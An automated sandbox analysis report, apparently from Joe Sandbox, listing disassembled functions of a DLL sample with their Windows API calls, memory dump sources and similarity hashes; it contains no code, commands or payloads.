                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$Init$Clear$Copy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3833040332-0
                                                                                                                                                                                                                                              • Opcode ID: 8a6e53b9210bb0e89437be4bea88c75bb32372daed9a9dbfc4079a7e78add6f4
                                                                                                                                                                                                                                              • Instruction ID: 5a2b1dfd57075a2d6e911fd8f7a6ddbef7706136de70af8c43f1fce39c9a4668
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a6e53b9210bb0e89437be4bea88c75bb32372daed9a9dbfc4079a7e78add6f4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C818D71901259AFDB04DFA8C880FEEBBB9BF49308F24455DE519A7780DB34E909CB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEFD880 Relevance: 18.2, APIs: 12, Instructions: 202COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEFD8EC
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32 ref: 6CEFD902
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEFD90D
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CEFD929
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CEFD966
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFD973
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CEFD9B4
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFD9C1
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFDA6F
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFDA80
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFDA87
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFDA99
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1625659656-0
                                                                                                                                                                                                                                              • Opcode ID: b3f7fda5633272bb71efd64008d7b10ba254baad18fbd8cf99bcbba445cc46c0
                                                                                                                                                                                                                                              • Instruction ID: 739dd2c0a7531848539736b15a18153013ea22199ac9c57ead5bf53bcbcdb7ed
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3f7fda5633272bb71efd64008d7b10ba254baad18fbd8cf99bcbba445cc46c0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 548136766087019FC700CF64C844B5ABBF8FF99718F148A5DE9A887750E774EA06CB92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE12A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 171COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                              • API String ID: 2168136238-4289949731
                                                                                                                                                                                                                                              • Opcode ID: 27af9e22db15a2d5060a23a1209f1c84f8954b0ed52ab6c7e3cac0fe3aec79fa
                                                                                                                                                                                                                                              • Instruction ID: 9f83a3b277181cc6d8d41f938631164db9d8b901883547e5d3e5d4e646f7b0b2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27af9e22db15a2d5060a23a1209f1c84f8954b0ed52ab6c7e3cac0fe3aec79fa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB41A6313016549BD714CF9CDC90A9EB3B6EB89394735092EE495C7F42DB31EC8587A2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF47D0 Relevance: 15.2, APIs: 10, Instructions: 168COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF480C
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF4815
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF481B
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEF4826
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,000000FF,?), ref: 6CEF485B
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF4868
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEF4974
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF4984
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF498A
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF4990
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2515392200-0
                                                                                                                                                                                                                                              • Opcode ID: 32aadca67d881345d9fbf7dc9b003c9c1f2499eef2f02065262e3bf38e2d8ce8
                                                                                                                                                                                                                                              • Instruction ID: d51bdb52bb230ff82022400f0e4bba5cc5c274e5c3cc5023ec4c182689b60265
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32aadca67d881345d9fbf7dc9b003c9c1f2499eef2f02065262e3bf38e2d8ce8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D513D72A002499FDB04DFA4CD80EAEBBB9FF99314F24456EE515E7640D734A906CB50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEEDCD0 Relevance: 15.1, APIs: 10, Instructions: 138COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEEDD00
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000003), ref: 6CEEDD10
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,6CEF2FFF,?), ref: 6CEEDD47
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEEDD4F
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,6CEF2FFF,?), ref: 6CEEDD6D
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6CEEDDA4
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEEDDAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEEDE16
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEEDE27
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEEDE31
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$Variant$ClearElement$Destroy$CreateInitVector
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3525949229-0
                                                                                                                                                                                                                                              • Opcode ID: 5820b863d5f8919274aef2d9b72fe36abf9b2b2ff15470e73c29ace6b6359d5f
                                                                                                                                                                                                                                              • Instruction ID: 911ab3dc35908d7be52bd744e2ccedef57a204a1d0fcfcf8e4f6468d8ef08f36
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5820b863d5f8919274aef2d9b72fe36abf9b2b2ff15470e73c29ace6b6359d5f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF515976E01609AFDB01DFA5D888EDEBBB8EF9D304F118119EA15A7710DB349905CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF0C1B0 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 266COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CF0C213
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF390ED
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: __CxxThrowException@8.LIBCMT ref: 6CF39102
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF39113
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                                                                              • String ID: gfff$gfff$gfff$gfff$gfff$gfff$vector<T> too long
                                                                                                                                                                                                                                              • API String ID: 1823113695-1254974138
                                                                                                                                                                                                                                              • Opcode ID: 864cab0d678d2e773dbf50bdb2f841be3d70a6ead7a5f30a142bf32a9f360446
                                                                                                                                                                                                                                              • Instruction ID: 4271d87467d49f6643e16994f2e4980386c964bdee5186d8ee4304e3a4736a7b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 864cab0d678d2e773dbf50bdb2f841be3d70a6ead7a5f30a142bf32a9f360446
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 279177B5A00209AFC718DF59DC90EEAB7B9EB88714F14861DE559D7740D730BA04CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE0CD0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                              • API String ID: 2168136238-4289949731
                                                                                                                                                                                                                                              • Opcode ID: 24ac53a4c7bacb6bbd905b5ce2001da186169f6403cb3adddfaacaa5b8f0a5a9
                                                                                                                                                                                                                                              • Instruction ID: 998dcf06857c97b01979f15b01b31ccb3c77748c1e41bcfd4c5e95fb68b3b002
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24ac53a4c7bacb6bbd905b5ce2001da186169f6403cb3adddfaacaa5b8f0a5a9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A51C5323015449BD724CE5CD880A5EB3FADBC9394B344A2EE855C7B94DF70EC4197A2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF01B20 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 154libraryloaderCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6CF01C5E
                                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6CF01C69
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,F1F2E532), ref: 6CF01CA2
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6CF01CC1
                                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(kernel32.dll,?,00000000), ref: 6CF01CCC
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EFF3E52B), ref: 6CF01D0A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                              • String ID: User32.dll$kernel32.dll
                                                                                                                                                                                                                                              • API String ID: 310444273-1965990335
                                                                                                                                                                                                                                              • Opcode ID: 7648e2fe0c7e34bbe4f1a40dd2b736113900097145e1d542e71e570b992b13ea
                                                                                                                                                                                                                                              • Instruction ID: a6ff74ef18ac5389b5dd558b7c3be0c42195f1f7e52c54af870c70525bac10b2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7648e2fe0c7e34bbe4f1a40dd2b736113900097145e1d542e71e570b992b13ea
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F616DB5600A009FC760CF58C192A6BBBF2FB45704F64CA18D4968BE52D736F846DB80
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEFC150 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEFC180
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,I7l,?), ref: 6CEFC1B8
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFC1C4
                                                                                                                                                                                                                                              • VariantCopy.OLEAUT32(I7l,?), ref: 6CEFC21B
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFC22F
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEFC23E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafeVariant$Clear$CopyCreateDestroyElementVector
                                                                                                                                                                                                                                              • String ID: I7l$I7l
                                                                                                                                                                                                                                              • API String ID: 3979206172-4116127961
                                                                                                                                                                                                                                              • Opcode ID: 77c452a215b06d6a984c4c4c631e95f7b32c473e3ffc450289a593f1d616cae6
                                                                                                                                                                                                                                              • Instruction ID: 31575a46c352e2376ded6e7a45b437f05e2d88da075f08137f5182c8945ac394
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77c452a215b06d6a984c4c4c631e95f7b32c473e3ffc450289a593f1d616cae6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01314C75B00609AFDB01DFA8C894F9EBBB8EF59304F208519E925D7750EB31D906CB60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF44409 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • UnDecorator::getArgumentList.LIBCMT ref: 6CF4442E
                                                                                                                                                                                                                                                • Part of subcall function 6CF43FC9: Replicator::operator[].LIBCMT ref: 6CF4404C
                                                                                                                                                                                                                                                • Part of subcall function 6CF43FC9: DName::operator+=.LIBCMT ref: 6CF44054
                                                                                                                                                                                                                                              • DName::operator+.LIBCMT ref: 6CF44487
                                                                                                                                                                                                                                              • DName::DName.LIBCMT ref: 6CF444DF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
